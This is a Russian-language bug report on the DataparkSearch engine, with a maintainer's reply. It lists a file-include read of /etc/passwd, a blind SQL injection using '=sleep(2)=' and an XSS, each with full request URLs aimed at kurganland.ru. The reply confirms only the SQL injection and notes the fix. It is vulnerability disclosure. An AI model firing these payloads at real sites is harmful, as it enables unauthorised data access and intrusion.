What steps will reproduce the problem? 1.File Include

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd

в GET параметре DU чтение фаила file:///etc/passwd /kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146

2.Blind SQL Injection

В фаиле search.cgi '=sleep(2)=' URL encoded GET в параметре cmd, GroupBySite, np, s, site /kurgan/s?cmd=%25D0%259D%25D0%25B0%25D0%25B9%25D1%2582%25D0%25B8%27%3dsleep%282%29%3d%27&GroupBySite=yes&np=0&q=1&s=DRP&syn=1

Выполняемый запрос: INSERT INTO qinfo (q_id,name,value) VALUES (82971,'cmd','%D0%9D%D0%B0%D0%B9%D1%82%D0%B8'=sleep(2)='')

3. Cross Site Scripting

В фаиле storedoc.cgi

Загрузка произвольной страницы из интернета и возможность выполнения JavaScript кода

http://kurganland.ru/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=http://himic.ru/xss.html&L=tr&label=&q=1&rec_id=1332401146

Выполнение: http://kurganland.ru/kurgan/cache?DU=http://himic.ru/xss.html

Подробнее: http://blog.himic.ru/HiMiC/2012/07/31/dataparksearch-engine-sql-injection-xss-cross-site-scripting-file-include.html

Пункт 2 подтвержден, фикс залит в SVN-репозиторий (ревизия 758).

Пункты 1 и 3 не подтверждаются. Параметр DU в шаблоне stortedoc, входящем в дистрибутив, используется только в тэге BASE, который используется браузером для разрешения относительных ссылок, поэтому если вы указываете в нем URL со схемой file:, то обращаться к указанному файлу брайзер будет на компьютере с браузером, а не с dpsearch. Ворзможно на kurganland.ru используется нестандартная версия шаблона storedoc.